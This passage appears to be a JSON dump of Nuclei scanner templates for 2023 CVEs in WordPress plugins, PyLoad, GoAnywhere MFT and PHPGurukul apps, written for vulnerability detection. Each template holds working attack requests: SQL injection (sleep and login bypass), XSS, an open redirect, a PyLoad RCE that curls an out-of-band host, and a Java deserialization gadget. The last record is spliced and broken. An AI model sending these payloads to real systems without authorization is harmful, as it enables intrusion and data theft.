4b0a00483046022100daa47e8a4a0788475b79a18cbc1ad7c5a77b7eb596d483b673abb302bc1652560221008be0757737078d080d1fae62c765719987415565af3c11d18506449909548690:922c64590222798bb761d5b6d8e72950", "hash": "9a256f8ffb1a89c12e7d86c89b4b9680", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ec" }, "name": "CVE-2023-0261.yaml", "content": "id: CVE-2023-0261\n\ninfo:\n name: WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection\n author: theamanrawat\n severity: high\n description: |\n WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries on the WordPress database, potentially leading to unauthorized access, data manipulation, or privilege escalation.\n remediation: Fixed in version 10.8.\n reference:\n - https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0\n - https://wordpress.org/plugins/wp-tripadvisor-review-slider/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0261\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2023-0261\n cwe-id: CWE-89\n epss-score: 0.0753\n epss-percentile: 0.93501\n cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ljapps\n product: wp_tripadvisor_review_slider\n framework: wordpress\n tags: cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 10s\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n content-type: application/x-www-form-urlencoded\n\n action=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=6'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"application/json\")'\n - 'contains(body_2, \"\\\"data\\\":{\")'\n condition: and\n# digest: 4a0a0047304502202cba63b19032eacb33e98f8c5b149b35ccef086fb44efb66696ab7a8c09d0435022100f4c8796c3c0aeaa9cc5d323fa7fcd5cfabcd35a46c056dd4c8a4b95b71032a1a:922c64590222798bb761d5b6d8e72950", "hash": "9bf42b6152fdd98d8de5391aa2c65107", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ed" }, "name": "CVE-2023-0297.yaml", "content": "id: CVE-2023-0297\n\ninfo:\n name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)\n author: MrHarshvardhan,DhiyaneshDk\n severity: critical\n description: |\n Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the target system.\n remediation: |\n Upgrade PyLoad to a version that is not affected by this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/51532\n - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-1058\n - http://packetstormsecurity.com/files/171096/pyLoad-js2py-Python-Execution.html\n - http://packetstormsecurity.com/files/172914/PyLoad-0.5.0-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-0297\n cwe-id: CWE-94\n epss-score: 0.35807\n epss-percentile: 0.96764\n cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: pyload\n product: pyload\n shodan-query: html:\"pyload\"\n zoomeye-query: app:\"pyLoad\"\n tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast\nvariables:\n cmd: \"curl {{interactsh-url}}\"\n\nhttp:\n - raw:\n - |\n GET /flash/addcrypted2 HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /flash/addcrypted2 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n jk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - 'JDownloader'\n\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n# digest: 4b0a00483046022100e04d22e3c9f98a73a04f2df0ebc25a6f86b2441aab53abde2822f6c4307266d4022100f3582924ba72e0f4076d042a65eb28d5f6ab0a70b9094581c0591d602a8e30f2:922c64590222798bb761d5b6d8e72950", "hash": "566ca2bd30e045cdbb46cb90a958befb", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ee" }, "name": "CVE-2023-0334.yaml", "content": "id: CVE-2023-0334\n\ninfo:\n name: ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin\n remediation: Fixed in version 3.6.3\n reference:\n - https://wpscan.com/vulnerability/b027a8db-0fd6-444d-b14a-0ae58f04f931\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0334\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0334\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40094\n cpe: cpe:2.3:a:shortpixel:shortpixel_adaptive_images:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: shortpixel\n product: shortpixel_adaptive_images\n framework: wordpress\n publicwww-query: /wp-content/plugins/shortpixel-adaptive-images/\n tags: cve2023,cve,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"shortpixel\") && contains(body, \"\")'\n condition: and\n# digest: 4a0a0047304502203508d5e191b0f01786fb58c69f6f58561b03fb802660cf3d9897bc32149c97b6022100c2759cc2f8e2cd0d0da129288ab33ee23dadc2e8c4ee0e78c6d5d4591758c2f9:922c64590222798bb761d5b6d8e72950", "hash": "ebebe0ed1bc0fc24d47671d456c117ee", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ef" }, "name": "CVE-2023-0448.yaml", "content": "id: CVE-2023-0448\n\ninfo:\n name: WP Helper Lite < 4.3 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 4.3 and above\n reference:\n - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0448\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0448\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.32657\n cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: matbao\n product: wp_helper_premium\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/wp-helper-lite\"\n tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(header, \"text/html\")'\n - 'contains(body, \">\")'\n - 'contains(body, \"params\\\":{\\\"action\")'\n condition: and\n# digest: 4b0a004830460221008d8aa32338bfb7f81e502ff42a03d08e31ef3ea396eb9a3ff9fa31026dd6ff740221009f8879ac6a1bdfdfd7cf3db48ff44c8bf0a5022ef91619d357685c2211a6d58a:922c64590222798bb761d5b6d8e72950", "hash": "70276ad9d303042ea778fca2d8b0e6be", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f0" }, "name": "CVE-2023-0514.yaml", "content": "id: CVE-2023-0514\n\ninfo:\n name: Membership Database <= 1.0 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a patched version of the Membership Database software or apply the necessary security patches provided by the vendor.\n reference:\n - https://wpscan.com/vulnerability/c6cc400a-9bfb-417d-9206-5582a49d0f05\n - https://wordpress.org/plugins/member-database/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0514\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0514\n cwe-id: CWE-79\n epss-score: 0.00071\n epss-percentile: 0.29003\n cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: membership_database_project\n product: membership_database\n framework: wordpress\n tags: cve2023,cve,wpscan,membership-database,wp,wp-plugin,wordpress,authenticated,xss,membership_database_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"Member Database\")'\n condition: and\n# digest: 490a0046304402206f0422b248523ed3922d1453f05cf58d5f60c4ae304a8a6f2ecaff8009992d6b022056ea05f2741c237996bb80986bc2a280c311a1d9802f2ae9e9e5a71038db2be2:922c64590222798bb761d5b6d8e72950", "hash": "f022d6edfcc0262112859b48e43c874c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f1" }, "name": "CVE-2023-0527.yaml", "content": "id: CVE-2023-0527\n\ninfo:\n name: Online Security Guards Hiring System - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: |\n A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://vuldb.com/?ctiid.219596\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0527\n - https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md\n - http://packetstormsecurity.com/files/172667/Online-Security-Guards-Hiring-System-1.0-Cross-Site-Scripting.html\n - https://vuldb.com/?id.219596\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0527\n cwe-id: CWE-79\n epss-score: 0.00228\n epss-percentile: 0.6097\n cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: online_security_guards_hiring_system_project\n product: online_security_guards_hiring_system\n tags: cve2023,cve,packetstorm,osghs,xss,online_security_guards_hiring_system_project\n\nhttp:\n - raw:\n - |\n POST /search-request.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n searchdata=&search=\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"\")'\n - 'contains(body, \"Online Security Gauard Hiring System |Search Request\")'\n condition: and\n# digest: 4a0a00473045022100a43c27d627e8467ae87028412d582a54888b15b6d467bebb762ba204dbf65113022041c5d7946de5f33a3cbcee2c5c5376022e68453311691ea38e97baf127489725:922c64590222798bb761d5b6d8e72950", "hash": "84ce3da86cf65b79c041e2b4dcb3d4a5", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f2" }, "name": "CVE-2023-0552.yaml", "content": "id: CVE-2023-0552\n\ninfo:\n name: WordPress Pie Register <3.8.2.3 - Open Redirect\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n remediation: |\n Fixed in version 3.8.2.3.\n reference:\n - https://wpscan.com/vulnerability/832c6155-a413-4641-849c-b98ba55e8551\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0552\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2023-0552\n cwe-id: CWE-601\n epss-score: 0.00092\n epss-percentile: 0.37956\n cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: genetechsolutions\n product: pie_register\n framework: wordpress\n tags: cve2023,cve,redirect,pie,pie-register,wpscan,genetechsolutions,wordpress\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me\"\n\n redirects: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$'\n# digest: 4a0a004730450221009a43102975ca9cbbf8f2d57a5f3a53496de4ac374bde3bcf0ee22cd7990f8c820220148b4d4d1ca0ef65545d30ac6b9ae93ed2bbf928f8b3e981e19fc44b2a19c151:922c64590222798bb761d5b6d8e72950", "hash": "65dd14b2250d3097c6bb982c33708d06", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f3" }, "name": "CVE-2023-0562.yaml", "content": "id: CVE-2023-0562\n\ninfo:\n name: Bank Locker Management System v1.0 - SQL Injection\n author: Harsh\n severity: critical\n description: |\n A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://vuldb.com/?ctiid.219716\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0562\n - https://vuldb.com/?id.219716\n - https://github.com/ctflearner/ctflearner\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-0562\n cwe-id: CWE-89\n epss-score: 0.02218\n epss-percentile: 0.89242\n cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: phpgurukul\n product: bank_locker_management_system\n tags: cve,cve2023,blms,sqli,bypass,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /banker/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(body, \"admin\")'\n - 'contains(body, \"BLMS | Dashboard\")'\n condition: and\n# digest: 4a0a00473045022100a83e4f426dee5b966ea13ce961702c3c9f146fb91cc171084ddc7b338df6982802205438c91226989896a74aeeae0b041231e409cadbe2eda2301ea0bb1d7eeab9ff:922c64590222798bb761d5b6d8e72950", "hash": "4c77542ae6d2531fc2ce3d0b6c53496c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f4" }, "name": "CVE-2023-0563.yaml", "content": "id: CVE-2023-0563\n\ninfo:\n name: Bank Locker Management System - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: |\n A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://vuldb.com/?ctiid.219717\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0563\n - https://vuldb.com/?id.219717\n - https://github.com/ctflearner/ctflearner\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2023-0563\n cwe-id: CWE-79\n epss-score: 0.00249\n epss-percentile: 0.64164\n cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: phpgurukul\n product: bank_locker_management_system\n tags: cve2023,cve,blms,xss,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /search-locker-details.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n searchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(body, \"/>\")'\n - 'contains(body, \"Bank Locker Management System\")'\n condition: and\n# digest: 4b0a00483046022100d454a122aad91e9dea4225555e6ced18d36bd03530358996ae175eea4f59a9cc022100e8591a78edb324b44d798e9732dd1eef101ead3d5e1f2de0e91e951457f2293a:922c64590222798bb761d5b6d8e72950", "hash": "6ae3bb5b7358479970a78a984986a563", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f5" }, "name": "CVE-2023-0600.yaml", "content": "id: CVE-2023-0600\n\ninfo:\n name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection\n author: r3Y3r53,j4vaovo\n severity: critical\n description: |\n The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.\n remediation: Fixed in version 6.9\n reference:\n - https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0600\n - https://github.com/truocphan/VulnBox\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-0600\n cwe-id: CWE-89\n epss-score: 0.02396\n epss-percentile: 0.89644\n cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: plugins-market\n product: wp_visitor_statistics\n framework: wordpress\n fofa-query: body=\"wp-stats-manager\"\n public-www: /wp-content/plugins/wp-stats-manager/\n tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market\nvariables:\n str: '{{rand_int(100000, 999999)}}'\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Real Time Traffic'\n\n - raw:\n - |\n @timeout: 30s\n GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"sleep(6)\")'\n condition: and\n# digest: 490a004630440220261580cf7a6acf3bd48c82b17b9befe18160f0f95f445a299f518bc9a852492902200976177287be838bdccc1077745ec0a5fb67ea2cbf3048964a74b82748fadfed:922c64590222798bb761d5b6d8e72950", "hash": "c9277f4a340fd7efd38800a3afb66086", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f6" }, "name": "CVE-2023-0602.yaml", "content": "id: CVE-2023-0602\n\ninfo:\n name: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.\n reference:\n - https://wpscan.com/vulnerability/c357f93d-4f21-4cd9-9378-d97756c75255\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0602\n - https://wordpress.org/plugins/twittee-text-tweet/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0602\n cwe-id: CWE-79\n epss-score: 0.00064\n epss-percentile: 0.26204\n cpe: cpe:2.3:a:johnniejodelljr:twittee_text_tweet:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: johnniejodelljr\n product: twittee_text_tweet\n framework: wordpress\n tags: cve2023,cve,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains_all(body_2, \"\", \"twittee\")'\n condition: and\n# digest: 4b0a00483046022100e5fce08d81164199e113a5e8a44e47e3a80de938ed5284232742f6ec12745cff022100af62d819e8c9fe644c67d22c4e6cb543bfce8719a6d6046b423facdeed2ee8e7:922c64590222798bb761d5b6d8e72950", "hash": "fe42c9cadfe873c79a71fd89fdb24f90", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f7" }, "name": "CVE-2023-0630.yaml", "content": "id: CVE-2023-0630\n\ninfo:\n name: Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection\n author: DhiyaneshDK\n severity: high\n description: |\n The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database, potentially exposing sensitive information.\n remediation: Fixed in version 4.9.3.3\n reference:\n - https://wpscan.com/vulnerability/b82bdd02-b699-4527-86cc-d60b56ab0c55\n - https://wordpress.org/plugins/wp-slimstat\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0630\n - https://github.com/nomi-sec/PoC-in-GitHub\n - https://github.com/RandomRobbieBF/CVE-2023-0630\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2023-0630\n cwe-id: CWE-89\n epss-score: 0.05275\n epss-percentile: 0.92293\n cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: wp-slimstat\n product: slimstat_analytics\n framework: wordpress\n tags: cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=7'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"application/json\")'\n - 'contains(body_2, \"audioShortcodeLibrary\")'\n condition: and\n# digest: 4a0a0047304502205d8cfa34716682707fd04b70f6767f9548456638742f3be97df93a370889381f022100f4b24efcacacbf6795ea4cc37fce07c2968f568e61300a6be831a398ff3fd492:922c64590222798bb761d5b6d8e72950", "hash": "f7bcdb2807dad9c9e17af86b6cdfd360", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f8" }, "name": "CVE-2023-0669.yaml", "content": "id: CVE-2023-0669\n\ninfo:\n name: Fortra GoAnywhere MFT - Remote Code Execution\n author: rootxharsh,iamnoooob,dhiyaneshdk,pdresearch\n severity: high\n description: |\n Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html\n - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1\n - https://infosec.exchange/@briankrebs/109795710941843934\n - https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0669\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2023-0669\n cwe-id: CWE-502\n epss-score: 0.96954\n epss-percentile: 0.99709\n cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: fortra\n product: goanywhere_managed_file_transfer\n shodan-query: http.favicon.hash:1484947000\n tags: cve2023,cve,rce,goanywhere,oast,kev,fortra\n\nhttp:\n - raw:\n - |\n POST /goanywhere/lic/accept HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Content-Type: application/x-www-form-urlencoded\n\n bundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - 'GoAnywhere'\n\n - type: status\n status:\n - 500\n# digest: 4a0a004730450220207c735e2469d6bf2af5178c7053b234490ccaa8584d568bb036adcc0ca0e16c022100dd5efb4ae7b7db86c7b6caee1806c494eeb8c6ce825ea4d94c449c4a09f4ff96:922c64590222798bb761d5b6d8e72950", "hash": "a31535042108e7a5764860c23db6745b", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f9" }, "name": "CVE-2023-0678.yaml", "content": "id: CVE-2023-0678\n\ninfo:\n name: PHPIPAM =5'\n - 'status_code_3 == 200'\n - 'contains(body_3, \"Security check\")'\n - 'contains(body_2, \"ap-pricing-tables-lite\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n part: body\n group: 1\n regex:\n - '_wpnonce=([0-9a-z]+)\">Log Out'\n internal: true\n# 